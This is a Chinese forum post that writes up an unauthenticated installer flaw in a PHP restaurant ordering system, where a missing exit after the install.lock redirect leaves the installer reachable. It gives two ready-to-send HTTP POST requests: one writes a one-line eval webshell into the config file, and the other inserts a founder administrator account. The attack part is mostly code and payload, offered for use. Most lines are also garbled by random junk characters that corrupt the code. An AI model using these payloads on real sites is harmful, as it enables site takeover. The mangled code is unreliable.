问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。6 {/ n" b* |2 z0 |0 N
, ]- z9 s6 h9 p) c+ d9 K+ b" g; o
<?php, X0 v6 Z6 A& [" A8 g8 }5 B
if(file_exists("../install.lock"))- L9 ?* G3 l& M, q; I
{
3 r2 A% i: v1 r% ~0 L3 z header("Location: ../");//没有退出8 A, O4 i1 G7 ~% k, j% ~
}- l6 O! z6 h9 A0 `* P1 |. Z: n
2 \' T: o# |8 L: P* A) P//echo 'tst';exit;
# y7 [) R* w. {( ~2 R' H2 lrequire_once("init.php");2 t" w$ T7 _- Q+ C
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
7 u* n0 Y8 A) v7 S( v; m' t; A( Y{5 v% P; {0 Z+ X! T% N
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
7 T" f! | o& A1 Z* t: f5 q( j
7 C2 ^/ F9 }# q) e3 M1、getshell(很危险)
4 ?! N- z0 ~3 x" m) Kif(empty($_REQUEST['step']) || $_REQUEST['step']==1)1 l$ P* C; n5 G7 T. C1 M
{1 I* Y# u: x8 j- V9 V
$smarty->assign("step",1);5 Z# j" b2 r- R& v+ b
$smarty->display("index.html");# M6 W1 x+ Y# C# U8 J# N5 `( }
}elseif($_REQUEST['step']==2)9 a$ G2 O; I8 k/ ~' L8 s4 O
{ ]% S* |+ V5 N/ Z( _5 m
$mysql_host=trim($_POST['mysql_host']);1 B% i, P9 x5 G" l% }! _& F
$mysql_user=trim($_POST['mysql_user']);/ X0 O* ]+ _0 {0 t! s6 R
$mysql_pwd=trim($_POST['mysql_pwd']);0 I6 l. O5 ?# V9 k2 h
$mysql_db=trim($_POST['mysql_db']);
: n W1 C. T) Q3 j m $tblpre=trim($_POST['tblpre']);
; t% M7 a! B! H/ k5 J $domain==trim($_POST['domain']);
" q. `; R9 z: ^3 p3 [4 W6 R% H $str="<?php \r\n";
% ?- \: ~& q( g! V) d; C $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";$ I4 X6 s' m* k1 N0 j
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
& Y" P" |2 ?# C" @% {/ i8 L $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
/ J; X& ]& v4 B $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";: x$ u& ]3 f0 T. W a2 ~
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
4 L$ O) z- p0 |0 l+ Y $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
$ Z( s! V0 j9 K; N0 q6 q' Y3 d $str.='define("DOMAIN","'.$domain.'");'."\r\n";, m& |2 A/ L; Y0 h& A/ z
$str.='define("SKINS","default");'."\r\n";' P2 I$ U3 b9 M$ @( N! T
$str.='?>';
- R$ H! d) y! j9 w0 g file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
: W* S: ^& ^2 c3 B上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马; o: j5 | `9 i3 k" i
POST /canting/install/index.php?m=index&step=2 HTTP/1.1# l1 \/ H1 y4 F( M, t+ ]
Host: 192.168.80.129
$ d- b- ~- o" n2 i9 B1 b6 RUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0! X: Q m4 ?. t" q- c) z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8: H8 h6 T) L8 j) j! S' ~6 ?, L
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3+ i6 Y R) I; `' j( N
Accept-Encoding: gzip, deflate# h) f+ A0 Y* J5 G; K# D3 _
Referer: http://192.168.80.129/canting/install/index.php?step=1) @3 \+ `2 J6 W+ L! n* K
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
, `$ [: C8 j$ RContent-Type: application/x-www-form-urlencoded
' i# }' Z0 k6 O8 BContent-Length: 126
$ A0 B g+ o9 I6 i3 c# _
, X5 v0 Y {) F, I7 Z7 ?$ omysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
% A' z3 M/ W8 y" ]1 q但是这个方法很危险,将导致网站无法运行。
4 c: ^2 m, F+ P0 q, z
+ j$ ^, r* R1 L8 D# J3 X2、直接添加管理员0 R0 v! M* i$ T: `; j
* c* E' v. r) {elseif($_REQUEST['step']==5)5 T9 A1 z4 F s4 j9 H4 z
{
( x9 G7 W; m! s p9 x if($_POST)$ M4 u! e; X$ D9 _
{ require_once("../config/config.inc.php");; J5 g2 I( e" z) ]- d2 r$ J3 g
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
* m; t5 r( c! u2 X mysql_select_db(MYSQL_DB,$link);- }/ u4 c& e) r
mysql_query("SET NAMES ".MYSQL_CHARSET );
) I! \# b$ I& ]6 w& Y# A; K mysql_query("SET sql_mode=''");
* V3 K5 e6 k6 O1 p. |- b& E6 l, k0 J! v# B1 S& D% y
$adminname=trim($_POST['adminname']);
+ M9 n) T+ W" {+ R- ? $pwd1=trim($_POST['pwd1']);' K( d! J$ n- _2 U, c4 g
$pwd2=trim($_POST['pwd2']);
4 R' `# C- L9 h$ G7 @; a1 D, E' B if(empty($adminname))
7 u0 X: W j9 X! C2 C& l {, b6 C$ b/ ? F# u6 J
' k: R. U [3 _2 ^5 E- { echo "<script>alert('管理员不能为空');history.go(-1);</script>";
# Z, U8 C2 U' e& ^0 ~$ R4 e exit();6 U; h; S+ _' N: Y0 x1 O4 W
} |+ S# H! H5 L! j& O [; Y
if(($pwd1!=$pwd2) or empty($pwd1))
2 S: c0 V! B' v4 R- C0 U {
: M8 X) q6 r' j+ @2 A3 u- ^8 I echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
1 y" i7 V0 Q1 v1 p* Z+ r }
# A$ \0 X, M& g3 H) H+ W mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员% \& F4 D6 c7 W; z* H; w" u& a& B
}
0 J% ^+ G9 n1 l4 H2 `; \" O2 o* h0 g4 _这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:, f1 s4 v1 B( R3 ^
POST /canting/install/index.php?m=index&step=5 HTTP/1.17 Q0 Q; G m+ h# I( l
Host: 192.168.80.129
% x# A. R% f/ u$ O: ?# JUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0, e+ V( D5 _! ~4 l( W& ?0 S0 z( Q/ r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
3 a4 n- w# `) m2 h: {' R' xAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.38 ]. O# |( p. W G0 j
Accept-Encoding: gzip, deflate( g( V+ w( ]' V5 a; H
Referer: http://www.2cto.com /canting/install/index.php?step=16 Z: n* t+ m1 d/ D# p
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
- u! ~7 B: |$ d; cContent-Type: application/x-www-form-urlencoded
3 T5 `; R: _: f; {$ aContent-Length: 46
- b( j1 `' ]( o l. K $ }6 ]6 U j* b/ |3 Q3 o
adminname=qingshen&pwd1=qingshen&pwd2=qingshen9 I0 ]% A; @0 c1 U, m
|
发表于 2012-12-4 11:13:44
收藏
支持
反对